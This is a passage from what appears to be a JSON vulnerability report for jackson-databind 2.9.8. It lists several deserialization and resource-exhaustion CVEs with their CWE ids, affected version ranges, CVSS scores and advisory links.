List","url":"https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9547"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9547"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9547/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-24750"]}],"cve":"CVE-2020-24750","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-24750"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20201009-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.6.7.5 and from 2.7.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.6"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.6"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24750"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24750"},{"summary":"NetApp Advisory ntap-20201009-0003","url":"https://security.netapp.com/advisory/ntap-20201009-0003"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.6"]}],"title":"CVE-2020-24750/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35491"]}],"cve":"CVE-2020-35491","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:11","ids":[{"system_name":"CVE Record","text":"CVE-2020-35491"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210122-0005"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Dynamically-Managed Code Resources","title":"Additional CWE: 913"},{"category":"description","details":"Vulnerability Description","text":"Serialization gadgets exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadgets exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35491"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35491"},{"summary":"NetApp Advisory ntap-20210122-0005","url":"https://security.netapp.com/advisory/ntap-20210122-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35491/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36187"]}],"cve":"CVE-2020-36187","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-36187"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36187"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36187"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36187/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10968"]}],"cve":"CVE-2020-10968","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-10968"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10968"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10968"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10968/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42004"]}],"cve":"CVE-2022-42004","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-10-03T00:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-42004"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"Gentoo Advisory","text":"glsa-202210-21"},{"system_name":"NetApp Advisory","text":"ntap-20221118-0008"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in FasterXML jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in FasterXML jackson-databind In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42004"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42004"},{"summary":"Gentoo Advisory glsa-202210-21","url":"https://security.gentoo.org/glsa/202210-21"},{"summary":"NetApp Advisory ntap-20221118-0008","url":"https://security.netapp.com/advisory/ntap-20221118-0008"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2022-42004/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10650"]}],"cve":"CVE-2020-10650","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-07-15T19:41:47","ids":[{"system_name":"CVE Record","text":"CVE-2020-10650"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpuoct2022"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0007"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization The com.fasterxml.jackson.core:jackson-databind library before version 2.9.10.4 is vulnerable to an Unsafe Deserialization vulnerability when handling interactions related to the class `ignite-jta`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10650"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10650"},{"summary":"NetApp Advisory ntap-20230818-0007","url":"https://security.netapp.com/advisory/ntap-20230818-0007"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2022","url":"https://www.oracle.com/security-alerts/cpuoct2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2020-10650/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11111"]}],"cve":"CVE-2020-11111","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:50","ids":[{"system_name":"CVE Record","text":"CVE-2020-11111"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11111"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11111"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11111/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36186"]}],"cve":"CVE-2020-36186","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-11-19T20:13:06","ids":[{"system_name":"CVE Record","text":"CVE-2020-36186"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36186"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36186"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36186/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowl